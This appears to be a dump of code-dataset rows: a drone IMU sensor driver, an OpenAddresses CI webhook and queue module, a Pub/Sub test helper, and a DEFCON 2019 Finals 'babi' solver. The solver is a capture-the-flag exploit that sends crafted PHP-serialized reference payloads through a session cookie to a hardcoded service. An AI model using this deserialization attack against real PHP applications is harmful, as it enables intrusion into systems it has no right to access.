repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dpm76/eaglebone
|
drone/flight/stabilization/imu6050.py
|
1
|
7844
|
# -*- coding: utf-8 -*-
'''
Created on 23/10/2015
@author: david
'''
import logging
import math
import time
import imu6050_defs as reg
from sensors.I2CSensor import I2CSensor
from sensors.vector import Vector
from copy import deepcopy
from flight.stabilization.state import SensorState
try:
import smbus
except ImportError:
class smbus(object):
@staticmethod
def SMBus(channel):
raise Exception("smbus module not found!")
class Imu6050(I2CSensor):
'''
Gyro and accelerometer
'''
ADDRESS = 0x68
GYRO2DEG = 250.0 / 32767.0 # +/- 250º/s mode
ACCEL2G = 2.0 / 32767.0 # +/- 2g mode
GRAVITY = 9.807 #m/s²
PI2 = math.pi / 2.0
ACCEL2MS2 = GRAVITY * ACCEL2G
#CALIBRATION_FILE_PATH = "../calibration.config.json"
def __init__(self):
'''
Constructor
'''
self._setAddress(Imu6050.ADDRESS)
self._bus = smbus.SMBus(1)
self._gyroOffset = [0]*3
self._gyroReadTime = time.time()
self._previousAngles = [0.0]*3
self._accOffset = [0]*3
self._accAnglesOffset = [0.0]*2
self._lastReadAccRawData = [0]*3
self._angSpeed = [0.0]*2
self._localGravity = 0.0
self._state = SensorState()
def _readRawGyroX(self):
return self._readWordHL(reg.GYRO_XOUT)
def _readRawGyroY(self):
return self._readWordHL(reg.GYRO_YOUT)
def _readRawGyroZ(self):
return self._readWordHL(reg.GYRO_ZOUT)
def _readAngSpeed(self, reg, index):
data = (self._readWordHL(reg) - self._gyroOffset[index]) * Imu6050.GYRO2DEG
return data
def readAngleSpeeds(self):
return self._state.angleSpeeds
def _readAngleSpeeds(self):
speedAX = self._readAngSpeedX()
speedAY = self._readAngSpeedY()
speedAZ = self._readAngSpeedZ()
self._state.angleSpeeds = [speedAX, speedAY, speedAZ]
def _readAngSpeedX(self):
return self._readAngSpeed(reg.GYRO_XOUT, 0)
def _readAngSpeedY(self):
return self._readAngSpeed(reg.GYRO_YOUT, 1)
def _readAngSpeedZ(self):
return self._readAngSpeed(reg.GYRO_ZOUT, 2)
def _readAccAngles(self):
rawAccX = self._readRawAccelX()
rawAccY = self._readRawAccelY()
rawAccZ = self._readRawAccelZ()
accAngX = math.degrees(math.atan2(rawAccY, rawAccZ))
accAngY = -math.degrees(math.atan2(rawAccX, rawAccZ))
accAngles = [accAngX, accAngY]
return accAngles
def readAngles(self):
return self._state.angles
def _readAngles(self):
accAngles = self._readAccAngles()
previousAngSpeeds = self._angSpeed
self._angSpeed = [self._state.angleSpeeds[0],self._state.angleSpeeds[1]] #[self._readAngSpeedX(), self._readAngSpeedY()]
currentTime = time.time()
dt2 = (currentTime - self._gyroReadTime) / 2.0
currentAngles = [0.0]*3
for index in range(2):
expectedAngle = self._previousAngles[index] + \
(self._angSpeed[index] + previousAngSpeeds[index]) * dt2
currentAngles[index] = 0.2 * accAngles[index] + 0.8 * expectedAngle
self._gyroReadTime = currentTime
self._previousAngles = currentAngles
self._state.angles = deepcopy(currentAngles)
def readDeviceAngles(self):
angles = self.readAngles()
angles[0] -= self._accAnglesOffset[0]
angles[1] -= self._accAnglesOffset[1]
return angles
def _readRawAccel(self, reg):
return self._readWordHL(reg)
def _readRawAccelX(self):
return self._readRawAccel(reg.ACC_XOUT)
def _readRawAccelY(self):
return self._readRawAccel(reg.ACC_YOUT)
def _readRawAccelZ(self):
return self._readRawAccel(reg.ACC_ZOUT)
def readAccels(self):
return self._state.accels
def _readAccels(self):
accelX = self._readRawAccelX() * Imu6050.ACCEL2MS2
accelY = self._readRawAccelY() * Imu6050.ACCEL2MS2
accelZ = self._readRawAccelZ() * Imu6050.ACCEL2MS2
angles = [math.radians(angle) for angle in self.readAngles()]
accels = Vector.rotateVector3D([accelX, accelY, accelZ], angles + [0.0])
#Eliminate gravity acceleration
accels[2] -= self._localGravity
self._state.accels = accels
def readQuaternions(self):
#TODO
pass
def resetGyroReadTime(self):
self._gyroReadTime = time.time()
def refreshState(self):
self._readAngleSpeeds()
self._readAngles()
self._readAccels()
def start(self):
'''
Initializes sensor
'''
startMessage = "Using IMU-6050."
print startMessage
logging.info(startMessage)
#Initializes gyro
self._bus.write_byte_data(self._address, reg.PWR_MGM1, reg.RESET)
self._bus.write_byte_data(self._address, reg.PWR_MGM1, reg.CLK_SEL_X)
#1kHz (as DPLF_CG_6) / (SMPLRT_DIV +1) => sample rate @50Hz)
self._bus.write_byte_data(self._address, reg.SMPRT_DIV, 19)
#DLPF_CFG_6: Low-pass filter @5Hz; analog sample rate @1kHz
self._bus.write_byte_data(self._address, reg.CONFIG, reg.DLPF_CFG_6)
self._bus.write_byte_data(self._address, reg.GYRO_CONFIG, reg.GFS_250)
self._bus.write_byte_data(self._address, reg.ACCEL_CONFIG, reg.AFS_2)
self._bus.write_byte_data(self._address, reg.PWR_MGM1, 0)
#TODO 20160202 DPM - Sample rate at least at 400Hz
#Wait for sensor stabilization
time.sleep(1)
self.calibrate()
def calibrate(self):
'''
Calibrates sensor
'''
print "Calibrating accelerometer..."
self._accOffset = [0.0]*3
i = 0
while i < 100:
self._accOffset[0] += self._readRawAccelX()
self._accOffset[1] += self._readRawAccelY()
self._accOffset[2] += self._readRawAccelZ()
time.sleep(0.02)
i+=1
for index in range(3):
self._accOffset[index] /= float(i)
#Calibrate gyro
print "Calibrating gyro..."
self._gyroOffset = [0.0]*3
i = 0
while i < 100:
self._gyroOffset[0] += self._readRawGyroX()
self._gyroOffset[1] += self._readRawGyroY()
self._gyroOffset[2] += self._readRawGyroZ()
time.sleep(0.02)
i += 1
for index in range(3):
self._gyroOffset[index] /= float(i)
#Calculate sensor installation angles
self._accAnglesOffset[0] = self._previousAngles[0] = math.degrees(math.atan2(self._accOffset[1], self._accOffset[2]))
self._accAnglesOffset[1] = self._previousAngles[1] = -math.degrees(math.atan2(self._accOffset[0], self._accOffset[2]))
#Calculate local gravity
angles = [math.radians(angle) for angle in self._accAnglesOffset]
accels = [accel * Imu6050.ACCEL2MS2 for accel in self._accOffset]
self._localGravity = Vector.rotateVector3D(accels, angles + [0.0])[2]
def getMaxErrorZ(self):
return 0.1
def stop(self):
pass
|
isc
| 3,956,320,715,344,091,600
| 23.974522
| 128
| 0.55394
| false
| 3.459197
| false
| false
| false
|
slibby/machine
|
openaddr/ci/__init__.py
|
1
|
28361
|
import logging; _L = logging.getLogger('openaddr.ci')
from ..compat import standard_library, expand_uri
from .. import jobs, render
from .objects import (
add_job, write_job, read_job, complete_set, update_set_renders,
add_run, set_run, copy_run, read_completed_set_runs,
get_completed_file_run, get_completed_run, new_read_completed_set_runs
)
from os.path import relpath, splitext, join, basename
from datetime import timedelta
from uuid import uuid4, getnode
from base64 import b64decode
from tempfile import mkdtemp
from shutil import rmtree
from time import sleep
import json, os
from flask import Flask, request, Response, current_app, jsonify, render_template
from requests import get, post
from dateutil.tz import tzutc
from psycopg2 import connect
from boto import connect_sns
from pq import PQ
# Ask Python 2 to get real unicode from the database.
# http://initd.org/psycopg/docs/usage.html#unicode-handling
import psycopg2.extensions
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
def load_config():
def truthy(value):
return bool(value.lower() in ('yes', 'true'))
secrets_string = os.environ.get('WEBHOOK_SECRETS', u'').encode('utf8')
webhook_secrets = secrets_string.split(b',') if secrets_string else []
return dict(GAG_GITHUB_STATUS=truthy(os.environ.get('GAG_GITHUB_STATUS', '')),
GITHUB_AUTH=(os.environ['GITHUB_TOKEN'], 'x-oauth-basic'),
MEMCACHE_SERVER=os.environ.get('MEMCACHE_SERVER'),
DATABASE_URL=os.environ['DATABASE_URL'],
WEBHOOK_SECRETS=webhook_secrets)
MAGIC_OK_MESSAGE = 'Everything is fine'
TASK_QUEUE, DONE_QUEUE, DUE_QUEUE = 'tasks', 'finished', 'due'
# Additional delay after JOB_TIMEOUT for due tasks.
DUETASK_DELAY = timedelta(minutes=5)
# Amount of time to reuse run results.
RUN_REUSE_TIMEOUT = timedelta(days=5)
# Time to chill out in pop_task_from_taskqueue() after sending Done task.
WORKER_COOLDOWN = timedelta(seconds=5)
def td2str(td):
''' Convert a timedelta to a string formatted like '3h'.
Will not be necessary when https://github.com/malthe/pq/pull/5 is released.
'''
return '{}s'.format(td.seconds + td.days * 86400)
def get_touched_payload_files(payload):
''' Return a set of files modified in payload commits.
'''
touched = set()
# Iterate over commits in chronological order.
for commit in payload['commits']:
for filelist in (commit['added'], commit['modified']):
# Include any potentially-new files.
touched.update(filelist)
for filename in commit['removed']:
# Skip files that no longer exist.
if filename in touched:
touched.remove(filename)
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
def get_touched_branch_files(payload, github_auth):
''' Return a set of files modified between master and payload head.
'''
branch_sha = payload['head_commit']['id']
compare1_url = payload['repository']['compare_url']
compare1_url = expand_uri(compare1_url, dict(base='master', head=branch_sha))
current_app.logger.debug('Compare URL 1 {}'.format(compare1_url))
compare1 = get(compare1_url, auth=github_auth).json()
merge_base_sha = compare1['merge_base_commit']['sha']
# That's no branch.
if merge_base_sha == branch_sha:
return set()
compare2_url = payload['repository']['compare_url']
compare2_url = expand_uri(compare2_url, dict(base=merge_base_sha, head=branch_sha))
current_app.logger.debug('Compare URL 2 {}'.format(compare2_url))
compare2 = get(compare2_url, auth=github_auth).json()
touched = set([file['filename'] for file in compare2['files']])
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
def get_touched_pullrequest_files(payload, github_auth):
''' Return a set of files modified between master and payload head.
'''
if payload['action'] == 'closed':
return set()
base_sha = payload['pull_request']['base']['sha']
head_sha = payload['pull_request']['head']['sha']
compare_url = payload['pull_request']['head']['repo']['compare_url']
compare_url = expand_uri(compare_url, dict(head=head_sha, base=base_sha))
current_app.logger.debug('Compare URL {}'.format(compare_url))
compare = get(compare_url, auth=github_auth).json()
touched = set([file['filename'] for file in compare['files']])
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
def skip_payload(payload):
''' Return True if this payload should not be processed.
'''
if 'action' in payload and 'pull_request' in payload:
return bool(payload['action'] == 'closed')
if 'commits' in payload and 'head_commit' in payload:
# Deleted refs will not have a status URL.
return bool(payload.get('deleted') == True)
return True
def process_payload_files(payload, github_auth):
''' Return a dictionary of file paths to raw JSON contents and file IDs.
'''
if 'action' in payload and 'pull_request' in payload:
return process_pullrequest_payload_files(payload, github_auth)
if 'commits' in payload and 'head_commit' in payload:
return process_pushevent_payload_files(payload, github_auth)
raise ValueError('Unintelligible webhook payload')
def process_pullrequest_payload_files(payload, github_auth):
''' Return a dictionary of files paths from a pull request event payload.
https://developer.github.com/v3/activity/events/types/#pullrequestevent
'''
files = dict()
touched = get_touched_pullrequest_files(payload, github_auth)
commit_sha = payload['pull_request']['head']['sha']
for filename in touched:
if relpath(filename, 'sources').startswith('..'):
# Skip things outside of sources directory.
continue
if splitext(filename)[1] != '.json':
# Skip non-JSON files.
continue
contents_url = payload['pull_request']['head']['repo']['contents_url'] + '{?ref}'
contents_url = expand_uri(contents_url, dict(path=filename, ref=commit_sha))
current_app.logger.debug('Contents URL {}'.format(contents_url))
got = get(contents_url, auth=github_auth)
contents = got.json()
if got.status_code not in range(200, 299):
current_app.logger.warning('Skipping {} - {}'.format(filename, got.status_code))
continue
if contents['encoding'] != 'base64':
raise ValueError('Unrecognized encoding "{encoding}"'.format(**contents))
current_app.logger.debug('Contents SHA {sha}'.format(**contents))
files[filename] = contents['content'], contents['sha']
return files
def process_pushevent_payload_files(payload, github_auth):
''' Return a dictionary of files paths from a push event payload.
https://developer.github.com/v3/activity/events/types/#pushevent
'''
files = dict()
touched = get_touched_payload_files(payload)
touched |= get_touched_branch_files(payload, github_auth)
commit_sha = payload['head_commit']['id']
for filename in touched:
if relpath(filename, 'sources').startswith('..'):
# Skip things outside of sources directory.
continue
if splitext(filename)[1] != '.json':
# Skip non-JSON files.
continue
contents_url = payload['repository']['contents_url'] + '{?ref}'
contents_url = expand_uri(contents_url, dict(path=filename, ref=commit_sha))
current_app.logger.debug('Contents URL {}'.format(contents_url))
got = get(contents_url, auth=github_auth)
contents = got.json()
if got.status_code not in range(200, 299):
current_app.logger.warning('Skipping {} - {}'.format(filename, got.status_code))
continue
if contents['encoding'] != 'base64':
raise ValueError('Unrecognized encoding "{encoding}"'.format(**contents))
current_app.logger.debug('Contents SHA {sha}'.format(**contents))
files[filename] = contents['content'], contents['sha']
return files
def get_commit_info(payload):
''' Get commit SHA and Github status API URL from webhook payload.
'''
if 'pull_request' in payload:
commit_sha = payload['pull_request']['head']['sha']
status_url = payload['pull_request']['statuses_url']
elif 'head_commit' in payload:
commit_sha = payload['head_commit']['id']
status_url = payload['repository']['statuses_url']
status_url = expand_uri(status_url, dict(sha=commit_sha))
else:
raise ValueError('Unintelligible payload')
current_app.logger.debug('Status URL {}'.format(status_url))
return commit_sha, status_url
def post_github_status(status_url, status_json, github_auth):
''' POST status JSON to Github status API.
'''
if status_url is None:
return
# Github only wants 140 chars of description.
status_json['description'] = status_json['description'][:140]
posted = post(status_url, data=json.dumps(status_json), auth=github_auth,
headers={'Content-Type': 'application/json'})
if posted.status_code not in range(200, 299):
raise ValueError('Failed status post to {}'.format(status_url))
if posted.json()['state'] != status_json['state']:
raise ValueError('Mismatched status post to {}'.format(status_url))
def update_pending_status(status_url, job_url, filenames, github_auth):
''' Push pending status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='pending',
description=u'Checking {}'.format(', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def update_error_status(status_url, message, filenames, github_auth):
''' Push error status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='error',
description=u'Errored on {}: {}'.format(', '.join(filenames), message))
return post_github_status(status_url, status, github_auth)
def update_failing_status(status_url, job_url, bad_files, filenames, github_auth):
''' Push failing status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='failure',
description=u'Failed on {} from {}'.format(', '.join(bad_files), ', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def update_empty_status(status_url, github_auth):
''' Push success status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='success',
description='Nothing to check')
return post_github_status(status_url, status, github_auth)
def update_success_status(status_url, job_url, filenames, github_auth):
''' Push success status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='success',
description=u'Succeeded on {}'.format(', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def find_batch_sources(owner, repository, github_auth):
''' Starting with a Github repo API URL, generate a stream of master sources.
'''
resp = get('https://api.github.com/', auth=github_auth)
if resp.status_code >= 400:
raise Exception('Got status {} from Github API'.format(resp.status_code))
start_url = expand_uri(resp.json()['repository_url'], dict(owner=owner, repo=repository))
_L.info('Starting batch sources at {start_url}'.format(**locals()))
got = get(start_url, auth=github_auth).json()
contents_url, commits_url = got['contents_url'], got['commits_url']
master_url = expand_uri(commits_url, dict(sha=got['default_branch']))
_L.debug('Getting {ref} branch {master_url}'.format(ref=got['default_branch'], **locals()))
got = get(master_url, auth=github_auth).json()
commit_sha, commit_date = got['sha'], got['commit']['committer']['date']
contents_url += '{?ref}' # So that we are consistently at the same commit.
sources_urls = [expand_uri(contents_url, dict(path='sources', ref=commit_sha))]
sources_dict = dict()
for sources_url in sources_urls:
_L.debug('Getting sources {sources_url}'.format(**locals()))
sources = get(sources_url, auth=github_auth).json()
for source in sources:
if source['type'] == 'dir':
params = dict(path=source['path'], ref=commit_sha)
sources_urls.append(expand_uri(contents_url, params))
continue
if source['type'] != 'file':
continue
path_base, ext = splitext(source['path'])
if ext == '.json':
_L.debug('Getting source {url}'.format(**source))
more_source = get(source['url'], auth=github_auth).json()
yield dict(commit_sha=commit_sha, url=source['url'],
blob_sha=source['sha'], path=source['path'],
content=more_source['content'])
def enqueue_sources(queue, the_set, sources):
''' Batch task generator, yields counts of remaining expected paths.
'''
expected_paths = set()
commit_sha = None
#
# Enqueue each source if there is nothing else in the queue.
#
for source in sources:
while len(queue) >= 1:
yield len(expected_paths)
with queue as db:
_L.info(u'Sending {path} to task queue'.format(**source))
task_data = dict(job_id=None, url=None, set_id=the_set.id,
name=source['path'],
content_b64=source['content'],
commit_sha=source['commit_sha'],
file_id=source['blob_sha'])
task_id = queue.put(task_data)
expected_paths.add(source['path'])
commit_sha = source['commit_sha']
while len(expected_paths):
with queue as db:
_update_expected_paths(db, expected_paths, the_set)
yield len(expected_paths)
with queue as db:
complete_set(db, the_set.id, commit_sha)
yield 0
def _update_expected_paths(db, expected_paths, the_set):
''' Discard sources from expected_paths set as they appear in runs table.
'''
for (_, source_path, _, _) in read_completed_set_runs(db, the_set.id):
_L.debug(u'Discarding {}'.format(source_path))
expected_paths.discard(source_path)
def render_index_maps(s3, runs):
''' Render index maps and upload them to S3.
'''
dirname = mkdtemp(prefix='index-maps-')
try:
good_runs = [run for run in runs if (run.state or {}).get('processed')]
good_sources = _prepare_render_sources(good_runs, dirname)
_render_and_upload_maps(s3, good_sources, '/', dirname)
finally:
rmtree(dirname)
def render_set_maps(s3, db, the_set):
''' Render set maps, upload them to S3 and add to the database.
'''
dirname = mkdtemp(prefix='set-maps-')
try:
s3_prefix = join('/sets', str(the_set.id))
runs = new_read_completed_set_runs(db, the_set.id)
good_sources = _prepare_render_sources(runs, dirname)
s3_urls = _render_and_upload_maps(s3, good_sources, s3_prefix, dirname)
update_set_renders(db, the_set.id, *s3_urls)
finally:
rmtree(dirname)
def _render_and_upload_maps(s3, good_sources, s3_prefix, dirname):
''' Render set maps, upload them to S3 and return their URLs.
'''
urls = dict()
areas = (render.WORLD, 'world'), (render.USA, 'usa'), (render.EUROPE, 'europe')
key_kwargs = dict(policy='public-read', headers={'Content-Type': 'image/png'})
url_kwargs = dict(expires_in=0, query_auth=False, force_http=True)
for (area, area_name) in areas:
png_basename = 'render-{}.png'.format(area_name)
png_filename = join(dirname, png_basename)
render.render(dirname, good_sources, 960, 2, png_filename, area)
with open(png_filename, 'rb') as file:
render_path = 'render-{}.png'.format(area_name)
render_key = s3.new_key(join(s3_prefix, png_basename))
render_key.set_contents_from_string(file.read(), **key_kwargs)
urls[area_name] = render_key.generate_url(**url_kwargs)
return urls['world'], urls['usa'], urls['europe']
def _prepare_render_sources(runs, dirname):
''' Dump all non-null set runs into a directory for rendering.
'''
good_sources = set()
for run in runs:
filename = '{source_id}.json'.format(**run.__dict__)
with open(join(dirname, filename), 'w+b') as file:
content = b64decode(run.source_data)
file.write(content)
if run.status is True:
good_sources.add(filename)
return good_sources
def calculate_job_id(files):
'''
'''
return str(uuid4())
#
# Previously, we created a deterministic hash of
# the files, but for now that might be too optimistic.
#
blob = json.dumps(files, ensure_ascii=True, sort_keys=True)
job_id = sha1(blob).hexdigest()
return job_id
def create_queued_job(queue, files, job_url_template, commit_sha, status_url):
''' Create a new job, and add its files to the queue.
'''
filenames = list(files.keys())
file_states = {name: None for name in filenames}
file_results = {name: None for name in filenames}
job_id = calculate_job_id(files)
job_url = job_url_template and expand_uri(job_url_template, dict(id=job_id))
job_status = None
with queue as db:
task_files = add_files_to_queue(queue, job_id, job_url, files, commit_sha)
add_job(db, job_id, None, task_files, file_states, file_results, status_url)
return job_id
def add_files_to_queue(queue, job_id, job_url, files, commit_sha):
''' Make a new task for each file, return dict of file IDs to file names.
'''
tasks = {}
for (file_name, (content_b64, file_id)) in files.items():
task_data = dict(job_id=job_id, url=job_url, name=file_name,
content_b64=content_b64, file_id=file_id,
commit_sha=commit_sha)
# Spread tasks out over time.
delay = timedelta(seconds=len(tasks))
queue.put(task_data, expected_at=td2str(delay))
tasks[file_id] = file_name
return tasks
def is_completed_run(db, run_id, min_datetime):
'''
'''
if min_datetime.tzinfo:
# Convert known time zones to UTC.
min_dtz = min_datetime.astimezone(tzutc())
else:
# Assume unspecified time zones are UTC.
min_dtz = min_datetime.replace(tzinfo=tzutc())
completed_run = get_completed_run(db, run_id, min_dtz)
if completed_run:
_L.debug('Found completed run {0} ({1}) since {min_datetime}'.format(*completed_run, **locals()))
else:
_L.debug('No completed run {run_id} since {min_datetime}'.format(**locals()))
return bool(completed_run is not None)
def update_job_status(db, job_id, job_url, filename, run_status, results, github_auth):
'''
'''
try:
job = read_job(db, job_id)
except TypeError:
raise Exception('Job {} not found'.format(job_id))
if filename not in job.states:
raise Exception('Unknown file from job {}: "{}"'.format(job.id, filename))
filenames = list(job.task_files.values())
job.states[filename] = run_status
job.file_results[filename] = results
# Update job status.
if False in job.states.values():
# Any task failure means the whole job has failed.
job.status = False
elif None in job.states.values():
job.status = None
else:
job.status = True
write_job(db, job.id, job.status, job.task_files, job.states, job.file_results, job.github_status_url)
if not job.github_status_url:
_L.warning('No status_url to tell about {} status of job {}'.format(job.status, job.id))
return
if job.status is False:
bad_files = [name for (name, state) in job.states.items() if state is False]
update_failing_status(job.github_status_url, job_url, bad_files, filenames, github_auth)
elif job.status is None:
update_pending_status(job.github_status_url, job_url, filenames, github_auth)
elif job.status is True:
update_success_status(job.github_status_url, job_url, filenames, github_auth)
def pop_task_from_taskqueue(s3, task_queue, done_queue, due_queue, output_dir):
'''
'''
with task_queue as db:
task = task_queue.get()
# PQ will return NULL after 1 second timeout if not ask
if task is None:
return
_L.info(u'Got file {name} from task queue'.format(**task.data))
passed_on_keys = 'job_id', 'file_id', 'name', 'url', 'content_b64', 'commit_sha', 'set_id'
passed_on_kwargs = {k: task.data.get(k) for k in passed_on_keys}
passed_on_kwargs['worker_id'] = hex(getnode()).rstrip('L')
interval = '{} seconds'.format(RUN_REUSE_TIMEOUT.seconds + RUN_REUSE_TIMEOUT.days * 86400)
previous_run = get_completed_file_run(db, task.data.get('file_id'), interval)
if previous_run:
# Make a copy of the previous run.
previous_run_id, _, _ = previous_run
copy_args = (passed_on_kwargs[k] for k in ('job_id', 'commit_sha', 'set_id'))
passed_on_kwargs['run_id'] = copy_run(db, previous_run_id, *copy_args)
# Don't send a due task, since we will not be doing any actual work.
else:
# Reserve space for a new run.
passed_on_kwargs['run_id'] = add_run(db)
# Send a Due task, possibly for later.
due_task_data = dict(task_data=task.data, **passed_on_kwargs)
due_queue.put(due_task_data, schedule_at=td2str(jobs.JOB_TIMEOUT + DUETASK_DELAY))
if previous_run:
# Re-use result from the previous run.
run_id, state, status = previous_run
message = MAGIC_OK_MESSAGE if status else 'Re-using failed previous run'
result = dict(message=message, reused_run=run_id, output=state)
else:
# Run the task.
from . import worker # <-- TODO: un-suck this.
source_name, _ = splitext(relpath(passed_on_kwargs['name'], 'sources'))
result = worker.do_work(s3, passed_on_kwargs['run_id'], source_name,
passed_on_kwargs['content_b64'], output_dir)
# Send a Done task
done_task_data = dict(result=result, **passed_on_kwargs)
done_queue.put(done_task_data, expected_at=td2str(timedelta(0)))
_L.info('Done')
# Sleep a short time to allow done task to show up in runs table.
# In a one-worker situation with repetitive pull request jobs,
# this helps the next job take advantage of previous run results.
sleep(WORKER_COOLDOWN.seconds + WORKER_COOLDOWN.days * 86400)
def pop_task_from_donequeue(queue, github_auth):
''' Look for a completed job in the "done" task queue, update Github status.
'''
with queue as db:
task = queue.get()
if task is None:
return
_L.info(u'Got file {name} from done queue'.format(**task.data))
results = task.data['result']
message = results['message']
run_state = results.get('output', None)
content_b64 = task.data['content_b64']
commit_sha = task.data['commit_sha']
worker_id = task.data.get('worker_id')
set_id = task.data.get('set_id')
job_url = task.data['url']
filename = task.data['name']
file_id = task.data['file_id']
run_id = task.data['run_id']
job_id = task.data['job_id']
if is_completed_run(db, run_id, task.enqueued_at):
# We are too late, this got handled.
return
run_status = bool(message == MAGIC_OK_MESSAGE)
set_run(db, run_id, filename, file_id, content_b64, run_state,
run_status, job_id, worker_id, commit_sha, set_id)
if job_id:
update_job_status(db, job_id, job_url, filename, run_status, results, github_auth)
def pop_task_from_duequeue(queue, github_auth):
'''
'''
with queue as db:
task = queue.get()
if task is None:
return
_L.info(u'Got file {name} from due queue'.format(**task.data))
original_task = task.data['task_data']
content_b64 = task.data['content_b64']
commit_sha = task.data['commit_sha']
worker_id = task.data.get('worker_id')
set_id = task.data.get('set_id')
job_url = task.data['url']
filename = task.data['name']
file_id = task.data['file_id']
run_id = task.data['run_id']
job_id = task.data['job_id']
if is_completed_run(db, run_id, task.enqueued_at):
# Everything's fine, this got handled.
return
run_status = False
set_run(db, run_id, filename, file_id, content_b64, None, run_status,
job_id, worker_id, commit_sha, set_id)
if job_id:
update_job_status(db, job_id, job_url, filename, run_status, False, github_auth)
def db_connect(dsn=None, user=None, password=None, host=None, database=None, sslmode=None):
''' Connect to database.
Use DSN string if given, but allow other calls for older systems.
'''
if dsn is None:
return connect(user=user, password=password, host=host, database=database, sslmode=sslmode)
return connect(dsn)
def db_queue(conn, name):
return PQ(conn, table='queue')[name]
def db_cursor(conn):
return conn.cursor()
class SnsHandler(logging.Handler):
''' Logs to the given Amazon SNS topic; meant for errors.
'''
def __init__(self, arn, *args, **kwargs):
super(SnsHandler, self).__init__(*args, **kwargs)
# Rely on boto AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables.
self.arn, self.sns = arn, connect_sns()
def emit(self, record):
subject = u'OpenAddr: {}: {}'.format(record.levelname, record.name)
if hasattr(record, 'request_info'):
subject = '{} - {}'.format(subject, record.request_info)
self.sns.publish(self.arn, self.format(record), subject[:79])
def setup_logger(sns_arn, log_level=logging.DEBUG):
''' Set up logging for openaddr code.
'''
# Get a handle for the openaddr logger and its children
openaddr_logger = logging.getLogger('openaddr')
# Default logging format.
log_format = '%(asctime)s %(levelname)07s: %(message)s'
# Set the logger level to show everything, and filter down in the handlers.
openaddr_logger.setLevel(log_level)
# Set up a logger to stderr
handler1 = logging.StreamHandler()
handler1.setLevel(log_level)
handler1.setFormatter(logging.Formatter(log_format))
openaddr_logger.addHandler(handler1)
# Set up a second logger to SNS
try:
handler2 = SnsHandler(sns_arn)
except:
openaddr_logger.warning('Failed to authenticate SNS handler')
else:
handler2.setLevel(logging.ERROR)
handler2.setFormatter(logging.Formatter(log_format))
openaddr_logger.addHandler(handler2)
if __name__ == '__main__':
app.run(debug=True)
|
isc
| -8,725,184,806,641,569,000
| 36.464993
| 106
| 0.618138
| false
| 3.714604
| false
| false
| false
|
GoogleCloudPlatform/healthcare
|
imaging/ml/toolkit/hcls_imaging_ml_toolkit/test_pubsub_util.py
|
1
|
1730
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility class for tests using Pub/Sub-related functionality."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Dict, Optional, Text
from google.cloud import pubsub_v1
class PubsubRunLoopExitError(BaseException):
"""Forces exit from the infinite PubsubListener run loop.
PubsubListener catches all exceptions inheriting from Exception within its
Run loop. Use this exceptions within tests to force exit.
"""
pass
def CreatePubsubReceivedMessage(
ack_id: Text,
data: Text,
message_id: Text,
attributes: Optional[Dict[Text, Text]] = None
) -> pubsub_v1.types.ReceivedMessage:
"""Creates a ReceivedMessage instance for testing.
Args:
ack_id: Pubsub ACK ID.
data: The payload of the Pubsub message.
message_id: Pubsub Message ID
attributes: Pubsub attributes.
Returns:
Instance of ReceivedMessage.
"""
return pubsub_v1.types.ReceivedMessage(
ack_id=ack_id,
message=pubsub_v1.types.PubsubMessage(
data=data.encode('utf8'),
message_id=message_id,
attributes=attributes))
|
apache-2.0
| 4,498,637,888,027,374,600
| 30.454545
| 76
| 0.731792
| false
| 3.931818
| false
| false
| false
|
Qwaz/solved-hacking-problem
|
DEFCON/2019 Finals/babi/solver.py
|
1
|
1302
|
from base64 import b64encode
from pwn import *
def s_array(*args):
assert len(args) % 2 == 0
return 'a:%d:{' % (len(args) // 2) + ''.join(args) + '}'
def s_bool(val):
return 'b:%d;' % val
def s_str(s):
return 's:%d:"%s";' % (len(s), s)
def s_ref(val):
return 'r:%d;' % val
def s_int(val):
return 'i:%d;' % val
def s_float(val):
return 'd:%f;' % val
def s_null():
return 'N;'
host = "10.13.37.8"
host = "localhost"
r = remote(host, 47793)
def send_payload(r, path, payload):
http_payload = "GET %s HTTP/1.1\r\n" % path
http_payload += "Host: z\r\n"
http_payload += "Connection: keep-alive\r\n"
http_payload += "Cookie: session=%s\r\n" % b64encode(payload)
http_payload += "\r\n"
r.send(http_payload)
result = ''
try:
t = r.recv(timeout=0.5)
while t != '':
result += t
t = r.recv(timeout=0.5)
except EOFError:
pass
return result
spray = s_array(
*[s_int(0x01010101 * i) for i in range(32)]
)
print send_payload(r, "/info", spray)
payload = s_array(
s_str("aaaa"), s_ref(4),
s_str("bbbb"), s_int(0x70),
s_ref(2), s_str("cccc")
)
print send_payload(r, "/info", payload)
|
gpl-2.0
| -9,006,028,544,528,207,000
| 15.835616
| 65
| 0.506144
| false
| 2.752643
| false
| false
| false
|
jhanley634/testing-tools
|
problem/covid/sd_cases_deaths.py
|
